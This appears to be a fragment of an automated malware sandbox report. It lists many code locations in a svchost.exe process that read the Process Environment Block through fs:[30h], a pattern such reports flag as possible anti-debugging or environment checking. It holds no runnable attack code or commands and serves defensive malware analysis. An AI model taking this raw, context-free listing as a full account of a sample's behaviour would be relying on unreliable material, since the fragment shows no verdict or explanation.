Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0384E627 mov eax, dword ptr fs:[00000030h]	2_2_0384E627
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03866620 mov eax, dword ptr fs:[00000030h]	2_2_03866620
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03868620 mov eax, dword ptr fs:[00000030h]	2_2_03868620
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0383262C mov eax, dword ptr fs:[00000030h]	2_2_0383262C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0384C640 mov eax, dword ptr fs:[00000030h]	2_2_0384C640
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038F866E mov eax, dword ptr fs:[00000030h]	2_2_038F866E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038F866E mov eax, dword ptr fs:[00000030h]	2_2_038F866E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0386A660 mov eax, dword ptr fs:[00000030h]	2_2_0386A660
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0386A660 mov eax, dword ptr fs:[00000030h]	2_2_0386A660
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03862674 mov eax, dword ptr fs:[00000030h]	2_2_03862674
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03832582 mov eax, dword ptr fs:[00000030h]	2_2_03832582
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03832582 mov ecx, dword ptr fs:[00000030h]	2_2_03832582
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03864588 mov eax, dword ptr fs:[00000030h]	2_2_03864588
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0386E59C mov eax, dword ptr fs:[00000030h]	2_2_0386E59C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038B05A7 mov eax, dword ptr fs:[00000030h]	2_2_038B05A7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038B05A7 mov eax, dword ptr fs:[00000030h]	2_2_038B05A7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038B05A7 mov eax, dword ptr fs:[00000030h]	2_2_038B05A7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038545B1 mov eax, dword ptr fs:[00000030h]	2_2_038545B1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038545B1 mov eax, dword ptr fs:[00000030h]	2_2_038545B1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0386E5CF mov eax, dword ptr fs:[00000030h]	2_2_0386E5CF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0386E5CF mov eax, dword ptr fs:[00000030h]	2_2_0386E5CF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038365D0 mov eax, dword ptr fs:[00000030h]	2_2_038365D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0386A5D0 mov eax, dword ptr fs:[00000030h]	2_2_0386A5D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0386A5D0 mov eax, dword ptr fs:[00000030h]	2_2_0386A5D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0385E5E7 mov eax, dword ptr fs:[00000030h]	2_2_0385E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0385E5E7 mov eax, dword ptr fs:[00000030h]	2_2_0385E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0385E5E7 mov eax, dword ptr fs:[00000030h]	2_2_0385E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0385E5E7 mov eax, dword ptr fs:[00000030h]	2_2_0385E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0385E5E7 mov eax, dword ptr fs:[00000030h]	2_2_0385E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0385E5E7 mov eax, dword ptr fs:[00000030h]	2_2_0385E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0385E5E7 mov eax, dword ptr fs:[00000030h]	2_2_0385E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0385E5E7 mov eax, dword ptr fs:[00000030h]	2_2_0385E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038325E0 mov eax, dword ptr fs:[00000030h]	2_2_038325E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0386C5ED mov eax, dword ptr fs:[00000030h]	2_2_0386C5ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0386C5ED mov eax, dword ptr fs:[00000030h]	2_2_0386C5ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038C6500 mov eax, dword ptr fs:[00000030h]	2_2_038C6500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03904500 mov eax, dword ptr fs:[00000030h]	2_2_03904500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03904500 mov eax, dword ptr fs:[00000030h]	2_2_03904500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03904500 mov eax, dword ptr fs:[00000030h]	2_2_03904500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03904500 mov eax, dword ptr fs:[00000030h]	2_2_03904500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03904500 mov eax, dword ptr fs:[00000030h]	2_2_03904500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03904500 mov eax, dword ptr fs:[00000030h]	2_2_03904500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03904500 mov eax, dword ptr fs:[00000030h]	2_2_03904500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03840535 mov eax, dword ptr fs:[00000030h]	2_2_03840535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03840535 mov eax, dword ptr fs:[00000030h]	2_2_03840535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03840535 mov eax, dword ptr fs:[00000030h]	2_2_03840535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03840535 mov eax, dword ptr fs:[00000030h]	2_2_03840535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03840535 mov eax, dword ptr fs:[00000030h]	2_2_03840535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03840535 mov eax, dword ptr fs:[00000030h]	2_2_03840535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0385E53E mov eax, dword ptr fs:[00000030h]	2_2_0385E53E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0385E53E mov eax, dword ptr fs:[00000030h]	2_2_0385E53E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0385E53E mov eax, dword ptr fs:[00000030h]	2_2_0385E53E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0385E53E mov eax, dword ptr fs:[00000030h]	2_2_0385E53E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0385E53E mov eax, dword ptr fs:[00000030h]	2_2_0385E53E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03838550 mov eax, dword ptr fs:[00000030h]	2_2_03838550
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03838550 mov eax, dword ptr fs:[00000030h]	2_2_03838550
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0386656A mov eax, dword ptr fs:[00000030h]	2_2_0386656A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0386656A mov eax, dword ptr fs:[00000030h]	2_2_0386656A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0386656A mov eax, dword ptr fs:[00000030h]	2_2_0386656A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038EA49A mov eax, dword ptr fs:[00000030h]	2_2_038EA49A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038364AB mov eax, dword ptr fs:[00000030h]	2_2_038364AB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038644B0 mov ecx, dword ptr fs:[00000030h]	2_2_038644B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038BA4B0 mov eax, dword ptr fs:[00000030h]	2_2_038BA4B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038304E5 mov ecx, dword ptr fs:[00000030h]	2_2_038304E5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03868402 mov eax, dword ptr fs:[00000030h]	2_2_03868402
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03868402 mov eax, dword ptr fs:[00000030h]	2_2_03868402
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03868402 mov eax, dword ptr fs:[00000030h]	2_2_03868402
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0382E420 mov eax, dword ptr fs:[00000030h]	2_2_0382E420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0382E420 mov eax, dword ptr fs:[00000030h]	2_2_0382E420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0382E420 mov eax, dword ptr fs:[00000030h]	2_2_0382E420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0382C427 mov eax, dword ptr fs:[00000030h]	2_2_0382C427
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038B6420 mov eax, dword ptr fs:[00000030h]	2_2_038B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038B6420 mov eax, dword ptr fs:[00000030h]	2_2_038B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038B6420 mov eax, dword ptr fs:[00000030h]	2_2_038B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038B6420 mov eax, dword ptr fs:[00000030h]	2_2_038B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038B6420 mov eax, dword ptr fs:[00000030h]	2_2_038B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038B6420 mov eax, dword ptr fs:[00000030h]	2_2_038B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038B6420 mov eax, dword ptr fs:[00000030h]	2_2_038B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0386A430 mov eax, dword ptr fs:[00000030h]	2_2_0386A430
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0386E443 mov eax, dword ptr fs:[00000030h]	2_2_0386E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0386E443 mov eax, dword ptr fs:[00000030h]	2_2_0386E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0386E443 mov eax, dword ptr fs:[00000030h]	2_2_0386E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0386E443 mov eax, dword ptr fs:[00000030h]	2_2_0386E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0386E443 mov eax, dword ptr fs:[00000030h]	2_2_0386E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0386E443 mov eax, dword ptr fs:[00000030h]	2_2_0386E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0386E443 mov eax, dword ptr fs:[00000030h]	2_2_0386E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0386E443 mov eax, dword ptr fs:[00000030h]	2_2_0386E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038EA456 mov eax, dword ptr fs:[00000030h]	2_2_038EA456
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0382645D mov eax, dword ptr fs:[00000030h]	2_2_0382645D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0385245A mov eax, dword ptr fs:[00000030h]	2_2_0385245A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038BC460 mov ecx, dword ptr fs:[00000030h]	2_2_038BC460
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0385A470 mov eax, dword ptr fs:[00000030h]	2_2_0385A470
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0385A470 mov eax, dword ptr fs:[00000030h]	2_2_0385A470
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0385A470 mov eax, dword ptr fs:[00000030h]	2_2_0385A470
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03840BBE mov eax, dword ptr fs:[00000030h]	2_2_03840BBE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03840BBE mov eax, dword ptr fs:[00000030h]	2_2_03840BBE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038E4BB0 mov eax, dword ptr fs:[00000030h]	2_2_038E4BB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038E4BB0 mov eax, dword ptr fs:[00000030h]	2_2_038E4BB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03850BCB mov eax, dword ptr fs:[00000030h]	2_2_03850BCB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03850BCB mov eax, dword ptr fs:[00000030h]	2_2_03850BCB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03850BCB mov eax, dword ptr fs:[00000030h]	2_2_03850BCB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03830BCD mov eax, dword ptr fs:[00000030h]	2_2_03830BCD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03830BCD mov eax, dword ptr fs:[00000030h]	2_2_03830BCD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03830BCD mov eax, dword ptr fs:[00000030h]	2_2_03830BCD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038DEBD0 mov eax, dword ptr fs:[00000030h]	2_2_038DEBD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03838BF0 mov eax, dword ptr fs:[00000030h]	2_2_03838BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03838BF0 mov eax, dword ptr fs:[00000030h]	2_2_03838BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03838BF0 mov eax, dword ptr fs:[00000030h]	2_2_03838BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0385EBFC mov eax, dword ptr fs:[00000030h]	2_2_0385EBFC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038BCBF0 mov eax, dword ptr fs:[00000030h]	2_2_038BCBF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03904B00 mov eax, dword ptr fs:[00000030h]	2_2_03904B00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038AEB1D mov eax, dword ptr fs:[00000030h]	2_2_038AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038AEB1D mov eax, dword ptr fs:[00000030h]	2_2_038AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038AEB1D mov eax, dword ptr fs:[00000030h]	2_2_038AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038AEB1D mov eax, dword ptr fs:[00000030h]	2_2_038AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038AEB1D mov eax, dword ptr fs:[00000030h]	2_2_038AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038AEB1D mov eax, dword ptr fs:[00000030h]	2_2_038AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038AEB1D mov eax, dword ptr fs:[00000030h]	2_2_038AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038AEB1D mov eax, dword ptr fs:[00000030h]	2_2_038AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038AEB1D mov eax, dword ptr fs:[00000030h]	2_2_038AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0385EB20 mov eax, dword ptr fs:[00000030h]	2_2_0385EB20
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0385EB20 mov eax, dword ptr fs:[00000030h]	2_2_0385EB20
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038F8B28 mov eax, dword ptr fs:[00000030h]	2_2_038F8B28
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038F8B28 mov eax, dword ptr fs:[00000030h]	2_2_038F8B28
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038E4B4B mov eax, dword ptr fs:[00000030h]	2_2_038E4B4B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038E4B4B mov eax, dword ptr fs:[00000030h]	2_2_038E4B4B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03902B57 mov eax, dword ptr fs:[00000030h]	2_2_03902B57
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03902B57 mov eax, dword ptr fs:[00000030h]	2_2_03902B57
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03902B57 mov eax, dword ptr fs:[00000030h]	2_2_03902B57
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03902B57 mov eax, dword ptr fs:[00000030h]	2_2_03902B57
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038C6B40 mov eax, dword ptr fs:[00000030h]	2_2_038C6B40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038C6B40 mov eax, dword ptr fs:[00000030h]	2_2_038C6B40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038FAB40 mov eax, dword ptr fs:[00000030h]	2_2_038FAB40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038D8B42 mov eax, dword ptr fs:[00000030h]	2_2_038D8B42
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03828B50 mov eax, dword ptr fs:[00000030h]	2_2_03828B50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038DEB50 mov eax, dword ptr fs:[00000030h]	2_2_038DEB50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0382CB7E mov eax, dword ptr fs:[00000030h]	2_2_0382CB7E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0383EA80 mov eax, dword ptr fs:[00000030h]	2_2_0383EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0383EA80 mov eax, dword ptr fs:[00000030h]	2_2_0383EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0383EA80 mov eax, dword ptr fs:[00000030h]	2_2_0383EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0383EA80 mov eax, dword ptr fs:[00000030h]	2_2_0383EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0383EA80 mov eax, dword ptr fs:[00000030h]	2_2_0383EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0383EA80 mov eax, dword ptr fs:[00000030h]	2_2_0383EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0383EA80 mov eax, dword ptr fs:[00000030h]	2_2_0383EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0383EA80 mov eax, dword ptr fs:[00000030h]	2_2_0383EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0383EA80 mov eax, dword ptr fs:[00000030h]	2_2_0383EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03904A80 mov eax, dword ptr fs:[00000030h]	2_2_03904A80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03868A90 mov edx, dword ptr fs:[00000030h]	2_2_03868A90
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03838AA0 mov eax, dword ptr fs:[00000030h]	2_2_03838AA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03838AA0 mov eax, dword ptr fs:[00000030h]	2_2_03838AA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03886AA4 mov eax, dword ptr fs:[00000030h]	2_2_03886AA4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03886ACC mov eax, dword ptr fs:[00000030h]	2_2_03886ACC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03886ACC mov eax, dword ptr fs:[00000030h]	2_2_03886ACC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03886ACC mov eax, dword ptr fs:[00000030h]	2_2_03886ACC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03830AD0 mov eax, dword ptr fs:[00000030h]	2_2_03830AD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03864AD0 mov eax, dword ptr fs:[00000030h]	2_2_03864AD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03864AD0 mov eax, dword ptr fs:[00000030h]	2_2_03864AD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0386AAEE mov eax, dword ptr fs:[00000030h]	2_2_0386AAEE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0386AAEE mov eax, dword ptr fs:[00000030h]	2_2_0386AAEE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038BCA11 mov eax, dword ptr fs:[00000030h]	2_2_038BCA11
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0386CA24 mov eax, dword ptr fs:[00000030h]	2_2_0386CA24
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0385EA2E mov eax, dword ptr fs:[00000030h]	2_2_0385EA2E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03854A35 mov eax, dword ptr fs:[00000030h]	2_2_03854A35
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03854A35 mov eax, dword ptr fs:[00000030h]	2_2_03854A35
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0386CA38 mov eax, dword ptr fs:[00000030h]	2_2_0386CA38
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03836A50 mov eax, dword ptr fs:[00000030h]	2_2_03836A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03836A50 mov eax, dword ptr fs:[00000030h]	2_2_03836A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03836A50 mov eax, dword ptr fs:[00000030h]	2_2_03836A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03836A50 mov eax, dword ptr fs:[00000030h]	2_2_03836A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03836A50 mov eax, dword ptr fs:[00000030h]	2_2_03836A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03836A50 mov eax, dword ptr fs:[00000030h]	2_2_03836A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03836A50 mov eax, dword ptr fs:[00000030h]	2_2_03836A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03840A5B mov eax, dword ptr fs:[00000030h]	2_2_03840A5B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03840A5B mov eax, dword ptr fs:[00000030h]	2_2_03840A5B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0386CA6F mov eax, dword ptr fs:[00000030h]	2_2_0386CA6F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0386CA6F mov eax, dword ptr fs:[00000030h]	2_2_0386CA6F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0386CA6F mov eax, dword ptr fs:[00000030h]	2_2_0386CA6F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038DEA60 mov eax, dword ptr fs:[00000030h]	2_2_038DEA60
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038ACA72 mov eax, dword ptr fs:[00000030h]	2_2_038ACA72
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038ACA72 mov eax, dword ptr fs:[00000030h]	2_2_038ACA72
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038429A0 mov eax, dword ptr fs:[00000030h]	2_2_038429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038429A0 mov eax, dword ptr fs:[00000030h]	2_2_038429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038429A0 mov eax, dword ptr fs:[00000030h]	2_2_038429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038429A0 mov eax, dword ptr fs:[00000030h]	2_2_038429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038429A0 mov eax, dword ptr fs:[00000030h]	2_2_038429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038429A0 mov eax, dword ptr fs:[00000030h]	2_2_038429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038429A0 mov eax, dword ptr fs:[00000030h]	2_2_038429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038429A0 mov eax, dword ptr fs:[00000030h]	2_2_038429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038429A0 mov eax, dword ptr fs:[00000030h]	2_2_038429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038429A0 mov eax, dword ptr fs:[00000030h]	2_2_038429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038429A0 mov eax, dword ptr fs:[00000030h]	2_2_038429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038429A0 mov eax, dword ptr fs:[00000030h]	2_2_038429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038429A0 mov eax, dword ptr fs:[00000030h]	2_2_038429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038309AD mov eax, dword ptr fs:[00000030h]	2_2_038309AD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038309AD mov eax, dword ptr fs:[00000030h]	2_2_038309AD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038B89B3 mov esi, dword ptr fs:[00000030h]	2_2_038B89B3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038B89B3 mov eax, dword ptr fs:[00000030h]	2_2_038B89B3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038B89B3 mov eax, dword ptr fs:[00000030h]	2_2_038B89B3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038C69C0 mov eax, dword ptr fs:[00000030h]	2_2_038C69C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0383A9D0 mov eax, dword ptr fs:[00000030h]	2_2_0383A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0383A9D0 mov eax, dword ptr fs:[00000030h]	2_2_0383A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0383A9D0 mov eax, dword ptr fs:[00000030h]	2_2_0383A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0383A9D0 mov eax, dword ptr fs:[00000030h]	2_2_0383A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0383A9D0 mov eax, dword ptr fs:[00000030h]	2_2_0383A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0383A9D0 mov eax, dword ptr fs:[00000030h]	2_2_0383A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038649D0 mov eax, dword ptr fs:[00000030h]	2_2_038649D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038FA9D3 mov eax, dword ptr fs:[00000030h]	2_2_038FA9D3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038BE9E0 mov eax, dword ptr fs:[00000030h]	2_2_038BE9E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038629F9 mov eax, dword ptr fs:[00000030h]	2_2_038629F9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038629F9 mov eax, dword ptr fs:[00000030h]	2_2_038629F9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038AE908 mov eax, dword ptr fs:[00000030h]	2_2_038AE908
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038AE908 mov eax, dword ptr fs:[00000030h]	2_2_038AE908
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038BC912 mov eax, dword ptr fs:[00000030h]	2_2_038BC912
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03828918 mov eax, dword ptr fs:[00000030h]	2_2_03828918
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03828918 mov eax, dword ptr fs:[00000030h]	2_2_03828918
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038B892A mov eax, dword ptr fs:[00000030h]	2_2_038B892A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038C892B mov eax, dword ptr fs:[00000030h]	2_2_038C892B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038B0946 mov eax, dword ptr fs:[00000030h]	2_2_038B0946
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03904940 mov eax, dword ptr fs:[00000030h]	2_2_03904940
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03856962 mov eax, dword ptr fs:[00000030h]	2_2_03856962
